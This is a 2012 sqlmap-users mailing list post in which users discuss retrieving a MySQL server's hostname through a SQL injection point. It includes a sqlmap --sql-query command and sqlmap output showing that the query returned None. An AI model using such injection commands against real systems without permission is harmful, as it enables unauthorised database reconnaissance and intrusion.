Re: [sqlmap-users] SQL Query To Retrieve MySQL Server IP Address
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] SQL Query To Retrieve MySQL Server IP Address
|
From: Zaki A. <zak...@gm...> - 2012-11-28 08:45:58
|
On Wed, Nov 28, 2012 at 3:39 PM, Leon Jacobs <leo...@gm...> wrote: > If its MySQL and according to [1], try: > > $ python sqlmap.py -u something --sql-query="show variables where > Variable_name = 'hostname'" > > I am not 100% sure about the required permissions/escaping that might be > needed to achieve this via your injection point though... Here's the result: Is it not possible from the injection point? Or are there any other sql-query? back-end DBMS: MySQL 5.0 [15:43:37] [INFO] fetching SQL SELECT statement query output: 'show variables where Variable_name = 'hostname'' [15:43:37] [WARNING] reflective value(s) found and filtering out [15:43:37] [INFO] resumed: None show variables where Variable_name = 'hostname': 'None' -- Zaki Akhmad |
